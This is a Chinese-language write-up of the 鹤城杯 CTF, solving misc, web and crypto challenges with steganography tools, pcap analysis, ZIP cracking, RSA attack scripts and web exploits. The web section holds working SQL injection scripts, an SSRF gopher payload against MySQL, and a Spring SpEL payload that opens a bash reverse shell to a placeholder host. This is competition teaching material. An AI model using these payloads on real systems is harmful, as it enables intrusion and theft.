鹤城杯 writeup

misc

new_misc

打开是个pdf文件,直接用wbStego4.3open无密码解密得flag

1
flag{verY_g00d_YoU_f0und_th1s}

流量分析

分析流量包,为GET型sql注入,形式如下

1
ascii(substr((select%20flag%20from%20t) 1 1))=102

提取ascii码数据

1
❯ tcpdump -r timu.pcapng -A | grep 'substr' | awk -F 'GET' '{print $2}' | awk -F '=' '{print $3}' | awk -F '--+' '{print $1}' > flag.txt
1
2
3
4
5
6
7
8
9
10
11
12
f = open("flag.txt","r")
lines = f.readlines()#读取全部内容 ,并以列表方式返回
n = len(lines)
flag = ''
for i in range(1,n):
a = int(lines[i-1].replace('\n', '').replace('\r', ''))
b = int(lines[i].replace('\n', '').replace('\r', ''))
if a > b:
flag = flag+chr(a)
print("\r{}".format(flag),end='')

#flag{w1reshARK_ez_1sntit}~~~~

Misc2

zsteg获得隐写信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
❯ zsteg check.png
b1,r,lsb,xy .. text: "CbBbBbCbFbBbFbGbGbGbBbCbGbGbGbCbCbBbFbCbCbGbGbCbCbGbFbCbCbG"
b1,rgb,lsb,xy .. text: "flag{h0w_4bouT_enc0de_4nd_pnG}m"
b1,bgr,lsb,xy .. <wbStego size=180, ext="\x00,\x0E", data="\xCCl\e\x8D\xAC\x0E\xCCm\x0E\x8D"..., even=false>
b2,r,lsb,xy .. text: "UUUUUUUUU@"
b2,r,msb,xy .. text: "}u]|)t]u|5\th}u]"
b2,b,lsb,xy .. text: "KA{@AAA@AA"
b2,rgba,lsb,xy .. text: "#c77s#77#s"
b3,abgr,msb,xy .. text: "tR'u@'}@/r"
b4,r,lsb,xy .. text: "FDDDDfvEDDUETD2#\"$TE2$TEDDR#2\"2gDDU#2\"2#\"C2%TB2#\"\"2C2\"0%DEV#2\"2#\"#3#2\"2#\"#3ETB2#\"#3#2\"2#\"\"2#2\"2"
b4,b,lsb,xy .. text: "fdTETETDtDT#TEWgTDTETETETDTETE2#TDR#2#S\""
b4,rgb,lsb,xy .. text: "!T'Rd7BU41B"
b4,bgr,lsb,xy .. text: "Q'$bW4RD5A4"
b4,rgba,lsb,xy .. text: "Bo@o@o@oAOo_nO~Oo_A_QO@OA_A_@OQOQO@"
b4,abgr,msb,xy .. text: " o$o o o /("

unicode解码得flag

1
2
&#x66;&#x6c;&#x61;&#x67;&#x7b;&#x68;&#x30;&#x77;&#x5f;&#x34;&#x62;&#x6f;&#x75;&#x54;&#x5f;&#x65;&#x6e;&#x63;&#x30;&#x64;&#x65;&#x5f;&#x34;&#x6e;&#x64;&#x5f;&#x70;&#x6e;&#x47;&#x7d;
#flag{h0w_4bouT_enc0de_4nd_pnG}

a_misc

john爆破密码qwer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
❯ zip2john amisc.zip > info.txt
ver 2.0 amisc.zip/1.png PKZIP Encr: cmplen=18925, decmplen=19966, crc=425F07BE
❯ john info.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
qwer (amisc.zip/1.png)
1g 0:00:00:00 DONE 2/3 (2021-10-08 12:16) 9.090g/s 310372p/s 310372c/s 310372C/s modem..robocop
Use the "--show" option to display all of the cracked passwords reliably
Session completed
❯ john info.txt --show
amisc.zip/1.png:qwer:1.png:amisc.zip::amisc.zip

1 password hash cracked, 0 left

对图片进行修复

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import binascii
import struct
import sys

file = '1.png'
fr = open(file,'rb').read()
data = bytearray(fr[0x0c:0x1d])
crc32key = eval('0x'+str(binascii.b2a_hex(fr[0x1d:0x21]))[2:-1])
#原来的代码: crc32key = eval(str(fr[29:33]).replace('\\x','').replace("b'",'0x').replace("'",''))
n = 4095
for w in range(n):
width = bytearray(struct.pack('>i', w))
for h in range(n):
height = bytearray(struct.pack('>i', h))
for x in range(4):
data[x+4] = width[x]
data[x+8] = height[x]
crc32result = binascii.crc32(data) & 0xffffffff
if crc32result == crc32key:
print(width,height)
newpic = bytearray(fr)
for x in range(4):
newpic[x+16] = width[x]
newpic[x+20] = height[x]
fw = open(file+'re.png','wb')
fw.write(newpic)
fw.close
sys.exit()

得到图片

下载得到一个流量包,分析为sql盲注,一样的提取信息

1
❯ tcpdump -r file.pcap -A | grep 'flag' | awk -F 'limit' '{print $2}' | awk -F 'sleep' '{print $1}' | awk -F '%2C' '{print $4}' | awk -F '%3D' '{print $2}' > flag.txt
1
2
3
4
5
6
7
8
9
10
11
f = open("flag.txt","r")
lines = f.readlines()#读取全部内容 ,并以列表方式返回
n = len(lines)
flag = ''
for i in range(1,n):
a = int(lines[i-1].replace('\n', '').replace('\r', ''))
b = int(lines[i].replace('\n', '').replace('\r', ''))
if a > b:
flag = flag+chr(a)
print("\r{}".format(flag),end='')
#flag{cd2c3e2fea463ded9af800d7155be7aq}

你能找到flag吗

m1

钓鱼城杯原题

zip明文攻击

根据压缩包备注提示,可以判定为zip明文攻击

1
2
Password is longer than 16 bytes, and includes at least one number and one uppercase letter.
Feel free to crack it if you can, probably with your high-performance quantum computer :)

首先提取capture.pcapng数据,数据从0x2C0xD8663

pcapng第二段文件头格式是固定的,利用其攻击

1
00 00 4D 3C 2B 1A 01 00 00 00 FF FF FF FF FF FF FF FF

使用bkcrack明文攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
echo -n "00004D3C2B1A01000000FFFFFFFFFFFFFFFF" | xxd -r -ps > pcapng
❯ bkcrack -C MI.zip -c capture.pcapng -p pcapng -o 6
bkcrack 1.3.1 - 2021-08-16
[21:18:17] Z reduction using 10 bytes of known plaintext
100.0 % (10 / 10)
[21:18:17] Attack on 642004 Z values at index 13
Keys: e33a580c c0c96a81 1246d892
81.3 % (522146 / 642004)
[21:28:57] Keys
e33a580c c0c96a81 1246d892
❯ bkcrack -C MI.zip -c capture.pcapng -k e33a580c c0c96a81 1246d892 -d capture_out.pcapng
bkcrack 1.3.1 - 2021-08-16
[21:29:32] Writing deciphered data capture_out.pcapng (maybe compressed)
Wrote deciphered data.
❯ bkcrack -C MI.zip -c hint_for_capture.txt -k e33a580c c0c96a81 1246d892 -d hint_for_capture_out.txt
bkcrack 1.3.1 - 2021-08-16
[21:29:40] Writing deciphered data hint_for_capture_out.txt (maybe compressed)
Wrote deciphered data.
❯ cat hint_for_capture_out.txt
you can get some base**-encoded data

流量分析

提取后url解码可以发现sql语句

1
SUBSTR((SELECT COALESCE(CAST(flag AS TEXT),CAST(X'20' AS TEXT)) FROM flags LIMIT 0,1),138,1)>CAST(X'69' AS TEXT)

未看懂wp,不知如何提取

提取得信息,结合提示,base85解码得

1
2
flag is md5("Sq1it3"+压缩包密码)
Hint: 密码是一个身份证号,且出生年份恰有两个质因子

爆破压缩包

官方wp用得是c++

生成身份证字典

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import time

#生成出生当年所有日期
def dateRange(year):
fmt = '%Y-%m-%d'
bgn = int(time.mktime(time.strptime(year+'-01-01',fmt)))
end = int(time.mktime(time.strptime(year+'-12-31',fmt)))
list_date = [time.strftime(fmt,time.localtime(i)) for i in range(bgn,end+1,3600*24)]
return [i.replace('-','') for i in list_date]

#身份证前六位
with open('p.txt','r') as f:
lines=f.readlines()
for line in lines:
id6 = line.replace('\n', '').replace('\r', '')
#print(id6)
#身份证7-14位
for x in range(2020,1980,-1):
data_time = dateRange(str(x))
#print(len(data_time))
for y in range(len(data_time)):
id8 = data_time[y]

#身份证15-17位
for z in range(1000):
if z<10:
z = '00'+str(z)
elif 10<=z and z<100:
z ='0'+str(z)
else:
z=str(z)
s = id6 + id8 + z +'X'
with open('password.txt', 'a') as f:
f.write(s+'\n')

zip2john解密

1
2
3
4
5
6
7
8
9
10
11
12
13
❯ zip2john -a hint_for_capture_out.txt MI.zip > john.txt
Using file hint_for_capture_out.txt as an 'ASCII' quick check file
ver 1.0 MI.zip/capture.pcapng PKZIP Encr: cmplen=886328, decmplen=886316, crc=2C1486C4
ver 1.0 MI.zip/hint_for_capture.txt PKZIP Encr: cmplen=48, decmplen=36, crc=E66A9C5
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
❯ john --wordlist=/home/jxswcy/Desktop/password.txt john.txt
#略
❯ john --show john.txt
MI.zip:32070119840810108X::MI.zip:hint_for_capture.txt, capture.pcapng:MI.zip

1 password hash cracked, 0 left

md5得flag

1
2
❯ md5 -s Sq1it332070119840810108X
MD5 ("Sq1it332070119840810108X") = 5cae25efeb73d7ba22f7728427376f59

web

middle_magic

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
<?php
highlight_file(__FILE__);
include "./flag.php";
include "./result.php";
if(isset($_GET['aaa']) && strlen($_GET['aaa']) < 20){

$aaa = preg_replace('/^(.*)level(.*)$/', '${1}<!-- filtered -->${2}', $_GET['aaa']);

if(preg_match('/pass_the_level_1#/', $aaa)){
echo "here is level 2";

if (isset($_POST['admin']) and isset($_POST['root_pwd'])) {
if ($_POST['admin'] == $_POST['root_pwd'])
echo '<p>The level 2 can not pass!</p>';
// START FORM PROCESSING
else if (sha1($_POST['admin']) === sha1($_POST['root_pwd'])){
echo "here is level 3,do you kown how to overcome it?";
if (isset($_POST['level_3'])) {
$level_3 = json_decode($_POST['level_3']);

if ($level_3->result == $result) {

echo "success:".$flag;
}
else {
echo "you never beat me!";
}
}
else{
echo "out";
}
}
else{

die("no");
}
// perform validations on the form data
}
else{
echo '<p>out!</p>';
}

}

else{
echo 'nonono!';
}

echo '<hr>';
}

?>

payload

1
2
3
4
get
?aaa=%0apass_the_level_1%23
post
admin[]=a&root_pwd[]=b&level_3={"result":0}

easy_sql_21

admin:admin成功登录,轻松注库名:ctf,版本:8.0.26-0

password=admin&username=admin’//and//ascii(substr((database()),1,1))>0#
password=admin&username=admin
过滤了select、tables不知道表名

库名、表名不区分大小写,用table进行列比较

库名:ctf

(‘def’,’{flag+chr(ascii)}’,’‘,’‘,’‘,’‘)>(table information_schema.schemata limit 4,1)
表名:fl11aag(用innodb_table_stats绕tables过滤)

(‘ctf’,’{flag+chr(ascii)}’,’2021-04-30 21:15:31’,0,0,0)>(table mysql.innodb_table_stats limit 1,1)
记录(flag含大小写,庆幸的是flag只有一行,直接查,不用列比较)

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import requests
url='http://182.116.62.85:26571/login.php'
select='hex((table ctf.fl11aag limit 1,1))'.replace(' ','/**/')

flag=''
for i in range(1,100):
for ascii in range(1,128):
# payload=f"password=admin&username=admin'/**/and/**/ascii(substr(({select}),{i},1))={ascii}#"
# payload=f"password=admin&username=admin"
# response=requests.get(url=url)
# response=requests.post(url=url, data=payload)
# response=requests.post(url,data={"password":"admin","username":f"'/**/or/**/ascii(substr(({select}),{i},1))={ascii}#"})
response=requests.post(url,data={"password":"admin","username":f"'/**/or/**/ascii(substr(({select}),{i},1))={ascii}#"})
# data={"password":"admin","username":f"'/**/or/**/('def','{flag+chr(ascii)}','~','~','~','~')>(table information_schema.schemata limit 4,1)#".replace(' ','/**/')}
# data={"password":"admin","username":f"'/**/or/**/('ctf','{flag+chr(ascii)}','2021-04-30 21:15:31',0,0,0)>(table mysql.innodb_table_stats limit 1,1)#".replace(' ','/**/')}
# response=requests.post(url,data=data)
# print(data,response.text)
if 'success' in response.text:
flag+=chr(ascii)
print(flag)
break
if ascii==127:
exit(0)

easy_sql_1

ssrf打mysql,admin:admin登进去,注半天注不出来,赛后请教师傅才知道是原题,注入点在成功登录设置的cookie中

Cookie: this_is_your_cookie=YWRtaW4%3D;
报错注入,没任何过滤,注了直接出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# import base64
# print(base64.b64encode(b'test'))

import requests
import base64
from urllib.parse import quote
url="http://182.116.62.85:28303/use.php"
data="""POST / HTTP/1.1
Host: 127.0.0.1
Content-Type:application/x-www-form-urlencoded
Cookie: this_is_your_cookie={}
Content-Length: {}
{}
"""
payload="""uname=admin&passwd=admin"""
# data=quote(data.format(base64.b64encode("admin') and updatexml(1,concat(0x7e,(select database())),1)#".encode("utf-8")).decode('utf8'),len(payload),payload)).replace('%0a','%0d%0a')
# data=quote(data.format(base64.b64encode("admin') and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 3,1)),1)#".encode("utf-8")).decode('utf8'),len(payload),payload)).replace('%0a','%0d%0a')
data=quote(data.format(base64.b64encode(b"admin') and updatexml(1,concat(0x7e,(select flag from flag)),1)#"),len(payload),payload)).replace('%0a','%0d%0a')
params={
"url":"gopher://127.0.0.1:80/_"+data
}
print(params)
response=requests.get(url=url,params=params)
print('this_is_your_cookie' in response.text)
print(response.text)

EasyP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php
include 'utils.php';

if (isset($_POST['guess'])) {
$guess = (string) $_POST['guess'];
if ($guess === $secret) {
$message = 'Congratulations! The flag is: ' . $flag;
} else {
$message = 'Wrong. Try Again';
}
}

if (preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF'])) {
exit("hacker :)");
}

if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])){
exit("hacker :)");
}

if (isset($_GET['show_source'])) {
highlight_file(basename($_SERVER['PHP_SELF']));
exit();
}else{
show_source(__FILE__);
}
?>

参见Zer0pts2020 Can you guess it?,增加了一个知识点

$_SERVER[‘PHP_SELF’]返回的是当前正在执行的脚本的名字

‘PHP_SELF’
当前执行脚本的文件名,与 document root 有关。例如,在地址为 http://example.com/foo/bar.php 的脚本中使用 $SERVER[‘PHP_SELF’] 将得到 /foo/bar.php。__FILE_ 常量包含当前(例如包含)文件的完整路径和文件名。 从 PHP 4.3.0 版本开始,如果 PHP 以命令行模式运行,这个变量将包含脚本名。之前的版本该变量不可用。

basename则可以返回路径中的文件名部分
如果传入/index.php/config.php/,则$_SERVER[‘PHP_SELF’]返回/index.php/config.php/,basename($_SERVER[‘PHP_SELF’])返回config.php
即/index.php/config.php/运行的是index.php,但是basename()获取到的是config.php
正常我们可以/index.php/config.php?source读取,但是因为存在正则/config.php/$/i来限制URL结尾出现config.php,返回空
此处利用点为basename函数的特性:在遇到非ascii字符时会将其舍弃
ASCII值范围为0-255,但ASCII码并没有规定编号为128~255的字符,ASCII表范围为0-127,也就是我们传入128以上的数值,即可绕过正则,128 -> 0x80
即当url为:basename(“config.php/xff”)实际为config.php,利用这个特点可以绕过正则的匹配:preg_match(‘/config.php/
$/i’)

下划线_绕过

根据官方文档来自 PHP 之外的变量,其中Anonymous说明

PHP转换为_(下划线)的字段名字符的完整列表如下(不只是点)。
chr(32) ( ) (空格)
chr(46) (.) (点)
chr(91) ([) (开放式方括号)
chr(128) - chr(159) (各种)
PHP不可逆转地修改了包含这些字符的字段名,以保持与已废弃的register_globals功能的兼容性。

另外深入研究preg_replace与代码执行一文中提到另一个特点

当非法字符为首字母时,只有点号会被替换成下划线
payload

1
index.php/utils.php/%ff?show[source

Spring1

https://www.cnblogs.com/cute-puli/p/13363752.html

1
_eventId_confirm=&_csrf=57033da7-4538-42ec-9933-e12ac3e97db5&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/x.x.x.x/2333+0>%261")).start()=vulhub

crypto

easy_crypto

1
公正公正公正诚信文明公正民主公正法治法治诚信民主自由敬业公正友善公正平等平等法治民主平等平等和谐敬业自由诚信平等和谐平等公正法治法治平等平等爱国和谐公正平等敬业公正敬业自由敬业平等自由法治和谐平等文明自由诚信自由平等富强公正敬业平等民主公正诚信和谐公正文明公正爱国自由诚信自由平等文明公正诚信富强自由法治法治平等平等自由平等富强法治诚信和谐

核心价值观解码

1
flag{IlUqU9O5guX6YiITsRNPiQmbhNRjGuTP}

a_crypto

1
2
3
4
5
6
7
8
9
10
11
4O595954494Q32515046324757595N534R52415653334357474R4N575955544R4O5N4Q46434S4O59474253464Q5N444R4Q51334557524O5N4S424944473542554O595N44534O324R49565746515532464O49345649564O464R4R494543504N35
#rot13
4B595954494D32515046324757595A534E52415653334357474E4A575955544E4B5A4D46434F4B59474253464D5A444E4D51334557524B5A4F424944473542554B595A44534B324E49565746515532464B49345649564B464E4E494543504A35
#hex
KYYTIM2QPF2GWYZSNRAVS3CWGNJWYUTNKZMFCOKYGBSFMZDNMQ3EWRKZOBIDG5BUKYZDSK2NIVWFQU2FKI4VIVKFNNIECPJ5
#base32
V143Pytkc2lAYlV3SlRmVXQ9X0dVdmd6KEYpP3t4V29+MElXSER9TUEkPA==
#base64
W^7?+dsi@bUwJTfUt=_GUvgz(F)?{xWo~0IWHD}MA$<
#base85
flag{W0w_y0u_c4n_rea11y_enc0d1ng!}

利用ciphey可直接出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
❯ ciphey -t '4O595954494Q32515046324757595N534R52415653334357474R4N575955544R4O5N4Q46434S4O59474253464Q5N444R4Q51334557524O5N4S424944473542554O595N44534O324R49565746515532464O49345649564O464R4R494543504N35'
Possible plaintext: 'flag{W0w_y0u_c4n_rea11y_enc0d1ng!}' (y/N): y
╭────────────────────────────────────────────────────────╮
│ The plaintext is a Capture The Flag (CTF) Flag │
│ Formats used: │
│ caesar: │
│ Key: 13 │
│ base16 │
│ utf8 │
│ base32 │
│ utf8 │
│ base64 │
│ utf8 │
│ base85 │
│ utf8Plaintext: "flag{W0w_y0u_c4n_rea11y_enc0d1ng!}"
╰────────────────────────────────────────────────────────╯

babyrsa

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from Crypto.Util.number import getPrime, bytes_to_long
from secret import flag

p = getPrime(1024)
q = getPrime(1024)
n = p * q
e = 65537
hint1 = p >> 724
hint2 = q % (2 ** 265)
ct = pow(bytes_to_long(flag), e, n)
print(hint1)
print(hint2)
print(n)
print(ct)
1
2
3
4
1514296530850131082973956029074258536069144071110652176122006763622293335057110441067910479
40812438243894343296354573724131194431453023461572200856406939246297219541329623
21815431662065695412834116602474344081782093119269423403335882867255834302242945742413692949886248581138784199165404321893594820375775454774521554409598568793217997859258282700084148322905405227238617443766062207618899209593375881728671746850745598576485323702483634599597393910908142659231071532803602701147251570567032402848145462183405098097523810358199597631612616833723150146418889589492395974359466777040500971885443881359700735149623177757865032984744576285054725506299888069904106805731600019058631951255795316571242969336763938805465676269140733371287244624066632153110685509892188900004952700111937292221969
19073695285772829730103928222962723784199491145730661021332365516942301513989932980896145664842527253998170902799883262567366661277268801440634319694884564820420852947935710798269700777126717746701065483129644585829522353341718916661536894041337878440111845645200627940640539279744348235772441988748977191513786620459922039153862250137904894008551515928486867493608757307981955335488977402307933930592035163126858060189156114410872337004784951228340994743202032248681976932591575016798640429231399974090325134545852080425047146251781339862753527319093938929691759486362536986249207187765947926921267520150073408188188

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from Crypto.Util.number import *
from gmpy2 import *
from tqdm import tqdm
import sys

p0 = 1514296530850131082973956029074258536069144071110652176122006763622293335057110441067910479
q2 = 40812438243894343296354573724131194431453023461572200856406939246297219541329623
n = 21815431662065695412834116602474344081782093119269423403335882867255834302242945742413692949886248581138784199165404321893594820375775454774521554409598568793217997859258282700084148322905405227238617443766062207618899209593375881728671746850745598576485323702483634599597393910908142659231071532803602701147251570567032402848145462183405098097523810358199597631612616833723150146418889589492395974359466777040500971885443881359700735149623177757865032984744576285054725506299888069904106805731600019058631951255795316571242969336763938805465676269140733371287244624066632153110685509892188900004952700111937292221969
c = 19073695285772829730103928222962723784199491145730661021332365516942301513989932980896145664842527253998170902799883262567366661277268801440634319694884564820420852947935710798269700777126717746701065483129644585829522353341718916661536894041337878440111845645200627940640539279744348235772441988748977191513786620459922039153862250137904894008551515928486867493608757307981955335488977402307933930592035163126858060189156114410872337004784951228340994743202032248681976932591575016798640429231399974090325134545852080425047146251781339862753527319093938929691759486362536986249207187765947926921267520150073408188188
e = 0x10001

# q2 -> p2
known_low_bits = 265
n2 = bin(n)[2:][-known_low_bits:]
p2 = ''
for i in range(known_low_bits):
if bin(int('1' + p2, 2) * q2)[2:].endswith(n2[-(i+1):]):
p2 = '1' + p2
else:
p2 = '0' + p2
p2 = int(p2, 2)
# print(bin(p2 * q2)[2:][-known_low_bit:])
# print(n2)

# p2, p0 -> p
p0 = p0 << 724
unknown_bits = 459
PR.<x> = PolynomialRing(Zmod(n))
for bit in range(10):
fx = p0 + x * 2 ^ (265 + bit) + p2
for i in tqdm(range(2**bit)):
f = fx + i * 2 ^ 265
f = f.monic()
kbits = unknown_bits - bit
p1 = f.small_roots(X=2 ^ kbits, beta=0.4)
if p1:
p = p0 + int(p1[0]) * 2 ^ (265 + bit) + p2 + i * 2 ^ 265
assert n % p == 0
q = n // p
print(long_to_bytes(pow(c, invert(e, n-p-q+1), n)))
sys.exit(0)
#flag{ef5e1582-8116-4f61-b458-f793dc03f2ff}

Crazy_Rsa_Tech

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from Crypto.Util.number import *
from Crypto.Util.Padding import *

FLAG = bytes_to_long(pad(b"flag{??????}",64))
def init_key():
p, q = getPrime(512), getPrime(512)
n = p*q
e = 9
while(GCD((p-1)*(q-1),e)!=1):
p, q = getPrime(512), getPrime(512)
n = p*q
d = inverse(e,(p-1)*(q-1))
return n,e,d

n_list=list()
c_list=list()
for i in range(9):
N,e,d=init_key()
n_list.append(N)
c=pow(FLAG,e,N)
c_list.append(pow(FLAG,e,N))
assert(pow(c,d,N)==FLAG)
print("n_list:",n_list)
print("c_list:",c_list)
1
2
n_list: [71189786319102608575263218254922479901008514616376166401353025325668690465852130559783959409002115897148828732231478529655075366072137059589917001875303598680931962384468363842379833044123189276199264340224973914079447846845897807085694711541719515881377391200011269924562049643835131619086349617062034608799, 92503831027754984321994282254005318198418454777812045042619263533423066848097985191386666241913483806726751133691867010696758828674382946375162423033994046273252417389169779506788545647848951018539441971140081528915876529645525880324658212147388232683347292192795975558548712504744297104487514691170935149949, 100993952830138414466948640139083231443558390127247779484027818354177479632421980458019929149817002579508423291678953554090956334137167905685261724759487245658147039684536216616744746196651390112540237050493468689520465897258378216693418610879245129435268327315158194612110422630337395790254881602124839071919, 59138293747457431012165762343997972673625934330232909935732464725128776212729547237438509546925172847581735769773563840639187946741161318153031173864953372796950422229629824699580131369991913883136821374596762214064774480548532035315344368010507644630655604478651898097886873485265848973185431559958627423847, 66827868958054485359731420968595906328820823695638132426084478524423658597714990545142120448668257273436546456116147999073797943388584861050133103137697812149742551913704341990467090049650721713913812069904136198912314243175309387952328961054617877059134151915723594900209641163321839502908705301293546584147, 120940513339890268554625391482989102665030083707530690312336379356969219966820079510946652021721814016286307318930536030308296265425674637215009052078834615196224917417698019787514831973471113022781129000531459800329018133248426080717653298100515701379374786486337920294380753805825328119757649844054966712377, 72186594495190221129349814154999705524005203343018940547856004977368023856950836974465616291478257156860734574686154136925776069045232149725101769594505766718123155028300703627531567850035682448632166309129911061492630709698934310123778699316856399909549674138453085885820110724923723830686564968967391721281, 69105037583161467265649176715175579387938714721653281201847973223975467813529036844308693237404592381480367515044829190066606146105800243199497182114398931410844901178842049915914390117503986044951461783780327749665912369177733246873697481544777183820939967036346862056795919812693669387731294595126647751951, 76194219445824867986050004226602973283400885106636660263597964027139613163638212828932901192009131346530898961165310615466747046710743013409318156266326090650584190382130795884514074647833949281109675170830565650006906028402714868781834693473191228256626654011772428115359653448111208831188721505467497494581]
c_list: [62580922178008480377006528793506649089253164524883696044759651305970802215270721223149734532870729533611357047595181907404222690394917605617029675103788705320032707977225447998111744887898039756375876685711148857676502670812333076878964148863713993853526715855758799502735753454247721711366497722251078739585, 46186240819076690248235492196228128599822002268014359444368898414937734806009161030424589993541799877081745454934484263188270879142125136786221625234555265815513136730416539407710862948861531339065039071959576035606192732936477944770308784472646015244527805057990939765708793705044236665364664490419874206900, 85756449024868529058704599481168414715291172247059370174556127800630896693021701121075838517372920466708826412897794900729896389468152213884232173410022054605870785910461728567377769960823103334874807744107855490558726013068890632637193410610478514663078901021307258078678427928255699031215654693270240640198, 14388767329946097216670270960679686032536707277732968784379505904021622612991917314721678940833050736745004078559116326396233622519356703639737886289595860359630019239654690312132039876082685046329079266785042428947147658321799501605837784127004536996628492065409017175037161261039765340032473048737319069656, 1143736792108232890306863524988028098730927600066491485326214420279375304665896453544100447027809433141790331191324806205845009336228331138326163746853197990596700523328423791764843694671580875538251166864957646807184041817863314204516355683663859246677105132100377322669627893863885482167305919925159944839, 2978800921927631161807562509445310353414810029862911925227583943849942080514132963605492727604495513988707849133045851539412276254555228149742924149242124724864770049898278052042163392380895275970574317984638058768854065506927848951716677514095183559625442889028813635385408810698294574175092159389388091981, 16200944263352278316040095503540249310705602580329203494665614035841657418101517016718103326928336623132935178377208651067093136976383774189554806135146237406248538919915426183225265103769259990252162411307338473817114996409705345401251435268136647166395894099897737607312110866874944619080871831772376466376, 31551601425575677138046998360378916515711528548963089502535903329268089950335615563205720969393649713416910860593823506545030969355111753902391336139384464585775439245735448030993755229554555004154084649002801255396359097917380427525820249562148313977941413268787799534165652742114031759562268691233834820996, 25288164985739570635307839193110091356864302148147148153228604718807817833935053919412276187989509493755136905193728864674684139319708358686431424793278248263545370628718355096523088238513079652226028236137381367215156975121794485995030822902933639803569133458328681148758392333073624280222354763268512333515]

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
import gmpy2
import math
from Crypto.Util.number import *
def merge(a1,n1,a2,n2):
d = math.gcd(n1,n2)
c = a2-a1
if c%d!=0:
return 0
c = (c%n2+n2)%n2
c = c//d
n1 = n1//d
n2 = n2//d
c *= gmpy2.invert(n1,n2)
c %= n2
c *= n1*d
c += a1
global n3
global a3
n3 = n1*n2*d
a3 = (c%n3+n3)%n3
return 1
def exCRT(a,n):
a1=a[0]
n1=n[0]
le= len(a)
for i in range(1,le):
a2 = a[i]
n2=n[i]
if not merge(a1,n1,a2,n2):
return -1
a1 = a3
n1 = n3
global mod
mod=n1
return (a1%n1+n1)%n1
def exCRT_getequation(a,n):
a1=a[0]
n1=n[0]
le= len(a)
for i in range(1,le):
a2 = a[i]
n2=n[i]
if not merge(a1,n1,a2,n2):
return -1
a1 = a3
n1 = n3
return (a1,n1)

n = [71189786319102608575263218254922479901008514616376166401353025325668690465852130559783959409002115897148828732231478529655075366072137059589917001875303598680931962384468363842379833044123189276199264340224973914079447846845897807085694711541719515881377391200011269924562049643835131619086349617062034608799, 92503831027754984321994282254005318198418454777812045042619263533423066848097985191386666241913483806726751133691867010696758828674382946375162423033994046273252417389169779506788545647848951018539441971140081528915876529645525880324658212147388232683347292192795975558548712504744297104487514691170935149949, 100993952830138414466948640139083231443558390127247779484027818354177479632421980458019929149817002579508423291678953554090956334137167905685261724759487245658147039684536216616744746196651390112540237050493468689520465897258378216693418610879245129435268327315158194612110422630337395790254881602124839071919, 59138293747457431012165762343997972673625934330232909935732464725128776212729547237438509546925172847581735769773563840639187946741161318153031173864953372796950422229629824699580131369991913883136821374596762214064774480548532035315344368010507644630655604478651898097886873485265848973185431559958627423847, 66827868958054485359731420968595906328820823695638132426084478524423658597714990545142120448668257273436546456116147999073797943388584861050133103137697812149742551913704341990467090049650721713913812069904136198912314243175309387952328961054617877059134151915723594900209641163321839502908705301293546584147, 120940513339890268554625391482989102665030083707530690312336379356969219966820079510946652021721814016286307318930536030308296265425674637215009052078834615196224917417698019787514831973471113022781129000531459800329018133248426080717653298100515701379374786486337920294380753805825328119757649844054966712377, 72186594495190221129349814154999705524005203343018940547856004977368023856950836974465616291478257156860734574686154136925776069045232149725101769594505766718123155028300703627531567850035682448632166309129911061492630709698934310123778699316856399909549674138453085885820110724923723830686564968967391721281, 69105037583161467265649176715175579387938714721653281201847973223975467813529036844308693237404592381480367515044829190066606146105800243199497182114398931410844901178842049915914390117503986044951461783780327749665912369177733246873697481544777183820939967036346862056795919812693669387731294595126647751951, 76194219445824867986050004226602973283400885106636660263597964027139613163638212828932901192009131346530898961165310615466747046710743013409318156266326090650584190382130795884514074647833949281109675170830565650006906028402714868781834693473191228256626654011772428115359653448111208831188721505467497494581]
